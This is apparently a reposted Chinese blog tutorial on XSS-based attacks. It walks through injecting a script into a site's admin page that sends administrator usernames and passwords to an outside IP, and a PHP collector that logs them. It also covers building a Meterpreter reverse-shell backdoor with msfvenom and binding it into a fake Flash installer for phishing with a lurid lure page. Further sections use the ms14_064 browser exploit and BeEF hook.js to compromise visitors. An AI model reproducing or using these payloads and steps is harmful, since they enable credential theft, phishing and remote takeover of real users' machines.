当前位置：首页 > news >正文

WEB攻防-通用漏洞_XSS跨站_权限维持_捆绑钓鱼_浏览器漏洞

news 文章来源：https://blog.csdn.net/weixin_45534587/article/details/145139052 2025/5/26 1:19:05

XSS的分类

XSS跨站-后台植入Cookie&表单劫持

【例1】：利用beef或xss平台实时监控Cookie等凭据实现权限维持

【例2】：XSS-Flash钓鱼配合MSF捆绑上线

【例3】：XSS-浏览器网马配合MSF访问上线

XSS的分类

反射型（非持久型）

存储型（持久型）

DOM型

MXSS(突变型XSS)

UXSS（通用型xss）

Flash XSS

上面这部分在上两篇文章讲过

UTF-7 XSS、MHTML XSS、CSS XSS、VBScript XSS，这几个基本上是淘汰的了，IE8之前才会受影响，没什么价值

XSS跨站-后台植入Cookie&表单劫持

- 条件：已经取得了web权限，要对后台的权限进行长期控制

　　1. 可以借助xss盗取cookie，把它写入到登录成功文件，利用beef或xss平台实时监控Cookie等凭据实现权限维持，这种方法即使管理员把后台账号密码改了，或者把后门删除了，也可以进行权限维持。（因为是插入的是xss-JavaScript语句，不会被后门工具识别）

　　2. 若存在同源策略或防护情况下，cookie获取失败或者密文密码解密不了，可以采用表单劫持或者通过数据明文传输来实现；

【例1】：利用beef或xss平台实时监控Cookie等凭据实现权限维持

1. 通过xxs平台或beef实时获取登录cookie

登录的框页面http://127.0.0.1:8105/admin/login/login.php

登录成功后会跳转到http://127.0.0.1:8105/admin/index.php?lang=cn 我们就可以在登录成功的admin/index.php里面，管理员进行登录时，就可以实时触发到xss平台或者BeEF获取到相关登录信息。

① 将跨站代码写入admin/index.php：

②成功登录网站后台

③打开beef，就可看到该主机已上线

可以观察到，他加载的数据包的内容

这样，只要登录成功就能获取，就能进行实时控制。进行了权限维持。

但是有一些网站不采用cookie，或者获取到的cookie不全，但是还是不能登录。

正常来讲，访问这个地址：http://127.0.0.1:8105/admin/index.php?lang=cn 进行抓包修改

有时候xss平台获取的cookie是不全的，或者说错误的。一般来说少了phpsessid (或者有防护httponly等)

那么就进行实时截取明文账号密码，这样才能进行权限维持。需要一定的代码基础，能读懂数据的传输流程。

2. 实时截取明文账号密码

主要解决两个问题： 1.cookie失败的时候（截取不到）； 2.取得一些权限，密码解密不了

① 观察这个网站的登录流程是怎样的：登录地址http://127.0.0.1:8105/admin/login/login.php 找到相对应的代码段D:\phpstudy_pro\WWW\xss-MetInfo5.1.4\admin\login\login.php 抓取登录的数据包

可以看到，他提交的数据包（账号、密码）是发送给了login_check.php文件

action=login&loginlang=login.php%3Flangset%3Dcn&login_name=admin&login_pass=admin&Submit=%E7%99%BB%E5%BD%95 再次观察login_check.php

接受账号密码的变量：接受账号：$metinfo_admin_name 接受密码：$metinfo_admin_pass

② JavaScript语句将账号和密码进行发送：通过get.php来实现接收

在PHP中，JavaScript语句通过变量（$up）来接收，构造payload：

$up='<script src=http://47.94.236.117/web/get.php?user='.$metinfo_admin_name.'&pass='.$metinfo_admin_pass.'></script>';

echo $up;

③ 在自己的服务器47.94.236.117，新建get.php，用于接收账号密码，并写到newfile文件中

<?php
$u=$_GET['user']; 
$p=$_GET['pass']; 
$myfile=fopen("newfile.txt","a+"); 
fwrite($myfile,$u); fwrite($myfile,'|');
fwrite($myfile,$p); 
fwrite($myfile,'\n'); 
fclose($myfile); 
?>

然后尝试登录这个网站中，可以看到他尝试请求http://47.94.236.117/web/get.php这个网站，把admin和password发送出

get.php接收到到的账号密码，就会保存到newfile中记录，这个时候就可以进行测试了。

【例2】：XSS-Flash钓鱼配合MSF捆绑上线

-条件：beef上线受控后或直接钓鱼（受害者爱看SESE）

① 生成后门，攻击pc端的：利用msf工具

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.100.167.248 LPORT=1111 -f exe > flash.exe

② 模仿flash下载官方地址（https://www.flash.cn/ ）做出本地页面：http://127.0.0.1:8081/ （构造一个相似域名的网址，更逼真）

③ 把后门放在D:\phpstudy_pro\WWW\web\目录，比如，index.html文件，

把“立即下载”链接的地址改为后门下载地址：http://127.0.0.1:8081/web/flash.exe

运行后门exe并且安装正常的文件，所以需要捆绑正常文件，在官方网站下载一个正常的flash文件

正常文件：flashcenter_pp_ax_install_cn.exe

后门文件：flash.exe

把两个文件放在一起，压缩

选择高级，自解压选项，解压到c:\windows\tmp

点击设置：解压前运行后门文件

在确定，压缩为rar文件，然后把文件名改成flash_install.exe，再把文件的图标进行修改。

图标修改用到Restorator2018_Full_1793_FIX工具，图片可以从官方的安装包中导出，然后再把它替换到我们创建的exe中

启动msf监听： msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0 //绑定本地的任意网卡

set lport 1111 //设置监听本地的1111端口

run //开启监听

那个别人是怎么访问你这个地址呢？

1.通过xss beef来让浏览器自动跳转到下载后门的地址，并且运行

2.直接发给对方诱使他去访问。通过发送消息，比如小迪与某主播瑟瑟画面流出：http://127.0.0.1:8081/web/诱惑.html 当访问者点击“播放按钮”，提示下下载FLASH，当对方安装flash时，后门执行，等待其上线

上线后，可以获取到对方的服务器信息

执行命令getuid、shell、whoami 等

这一类遇到的问题：免杀问题（后门下载下来会遭到火绒等查杀）

【例3】：XSS-浏览器网马配合MSF访问上线

-条件：beef上线受控后或直接钓鱼（浏览器存在0day）配合漏洞CVE-2019-1367，这个版本是IE11的漏洞，但是没有公开exp。

参考文章：https://www.cnblogs.com/yuzly/p/11609934.html

漏洞CVE-2020-1380：https://bbs.pediy.com/thread-263885.htm

但是前面的漏洞并没有公开，所以只能用到ms14_064这个漏洞，参考https://blog.csdn.net/wylululu/article/details/103868759 用的是Windows7这个版本的IE，在当前的网络环境中就很少他了。

1、配置MSF生成URL use exploit/windows/browser/ms14_064_ole_code_execution

set allowpowershellprompt true

set target 1

run

运行就会生成一个网码地址（http://47.100.167.248:8080/9gwKDtliqQz ），这个地址只要一访问就会被触发。但是这个地址只针对window7/window xp操作系统的IE浏览器访问

使用kali搭建的msf：

只要访问这个地址，就可以直接拿下服务器权限。还需要用满足的浏览器和Windows版本。内核，操作系统，还有杀毒软件，都会导致失败。要懂得前提条件，不是只要访问就可以上线。

那么他在xss中如何实现呢？

在beef中启动：docker run --rm -p 3000:3000 janes/beef

登录beef：47.100.167.248:3000/ui/panel

构造代码：<script src=http://47.100.167.248:3000/hook.js></script> 把代码放在自己网站上，比如，我的博客上（或者本地网站上）的test.html，只要对方访问192.168.199.1:8081/web/test.html，在beef就可以看到对方上线，

在beef上，利用浏览器跳转功能，自动跳转访问到msf生成的访问地址

然后就可以监控到对方上线，完成测试。

WEB攻防-通用漏洞_XSS跨站_权限维持_捆绑钓鱼_浏览器漏洞

XSS的分类

XSS跨站-后台植入Cookie&表单劫持

【例1】：利用beef或xss平台实时监控Cookie等凭据实现权限维持

【例2】：XSS-Flash钓鱼配合MSF捆绑上线

【例3】：XSS-浏览器网马配合MSF访问上线

相关文章：

WEB攻防-通用漏洞_XSS跨站_权限维持_捆绑钓鱼_浏览器漏洞

人工智能任务20-利用LSTM和Attention机制相结合模型在交通流量预测中的应用

Day04-后端Web基础——Maven基础

Hive SQL必刷练习题：留存率问题

虚拟同步机（VSG）Matlab/Simulink仿真模型

单头注意力机制(SHSA)详解

【漏洞分析】DDOS攻防分析

JavaScript动态渲染页面爬取之Splash

慧集通（DataLinkX）iPaaS集成平台-系统管理之UI库管理、流程模板

OpenCV相机标定与3D重建(59)用于立体相机标定的函数stereoCalibrate()的使用

摄像头模块在狩猎相机中的应用

ruoyi-cloud docker启动微服务无法连接nacos，Client not connected, current status:STARTING

代码随想录算法训练营第三十四天-动态规划-63. 不同路径II

在一个sql select中作多个sum并分组

家用电路频繁跳闸的原因及解决方法！

我的年度总结

ASP.NET Core 多环境配置

docker 安装mongodb

完整地实现了推荐系统的构建、实验和评估过程，为不同推荐算法在同一数据集上的性能比较提供了可重复实验的框架

DRV8311三相PWM无刷直流电机驱动器

Mysql--运维篇--备份和恢复（逻辑备份，mysqldump，物理备份，热备份，温备份，冷备份，二进制文件备份和恢复等）

机器学习-归一化

Linux 串口检查状态的实用方法

Qt的核心机制概述

微调神经机器翻译模型全流程

Cesium加载地形

gitlab runner正常连接提示作业挂起中,等待进入队列解决办法

C#对动态加载的DLL进行依赖注入，并对DLL注入服务

HDMI接口

A/B 测试：玩转假设检验、t 检验与卡方检验